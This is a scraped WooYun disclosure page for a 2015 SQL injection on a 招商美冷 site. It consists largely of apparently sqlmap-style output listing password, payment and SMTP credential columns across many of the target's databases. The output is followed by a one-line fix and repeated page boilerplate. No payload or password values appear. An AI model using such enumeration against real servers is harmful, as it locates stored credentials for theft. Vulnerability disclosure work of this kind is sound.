+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: mjkj
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: qiaolu
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: qiaolu
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: qiaolu
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: qiaolu
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: qiaolu
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: qiaolu
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: qiaolu
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: qiaolu
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: msdb
Table: backupset
[1 column]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| is_password_protected | bit  |
+-----------------------+------+
Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| is_password_protected | bit  |
+-----------------------+------+
Database: rcsw1
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: rcsw1
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: rcsw1
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: rcsw1
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: rcsw1
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: rcsw1
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: rcsw1
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: rcsw1
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: ReportServer
Table: DataSource
[1 column]
+----------+-------+
| Column   | Type  |
+----------+-------+
| Password | image |
+----------+-------+
Database: master
Table: sysoledbusers
[1 column]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| rmtpassword | nvarchar |
+-------------+----------+
Database: master
Table: syslogins
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: master
Table: sysusers
[1 column]
+----------+-----------+
| Column   | Type      |
+----------+-----------+
| password | varbinary |
+----------+-----------+
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column        | Type      |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+
Database: siyi
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: siyi
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: siyi
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: siyi
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: siyi
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: siyi
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: siyi
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: siyi
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: zhaoshangmeileng
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: zhaoshangmeileng
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: zhaoshangmeileng
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: zhaoshangmeileng
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: zhaoshangmeileng
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: zhaoshangmeileng
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: zhaoshangmeileng
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: zhaoshangmeileng
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: cqrhyEnglish
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: cqrhyEnglish
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: cqrhyEnglish
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: cqrhyEnglish
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: cqrhyEnglish
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: cqrhyEnglish
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: cqrhyEnglish
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: cqrhyEnglish
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: qmkgb
Table: blog_Member
[1 column]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| mem_Password | nvarchar |
+--------------+----------+
Database: yideng_data
Table: CB_Admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | nvarchar |
+----------+----------+
Database: yideng_data
Table: CB_Discount
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | nvarchar |
+----------+----------+
Database: yideng_data
Table: CB_Smtp
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | nvarchar |
+----------+----------+
Database: yideng_data
Table: CB_Member
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | nvarchar |
+----------+----------+
Database: yrw
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: yrw
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: yrw
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: yrw
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: yrw
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: yrw
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: yrw
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: yrw
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-11-20 15:27

厂商回复：

Referred to related parties.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153047

漏洞标题：招商美冷某站存在SQL插入攻擊（DBA權限，系統管理員密碼泄露，15萬系統日誌泄露，admin明文密碼泄露）（香港地區）

相关厂商：招商美冷

漏洞作者：路人甲

提交时间：2015-11-09 15:56

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153047

漏洞标题：招商美冷某站存在SQL插入攻擊（DBA權限，系統管理員密碼泄露，15萬系統日誌泄露，admin明文密碼泄露）（香港地區）

相关厂商：招商美冷

漏洞作者： 路人甲

提交时间：2015-11-09 15:56

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153047"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云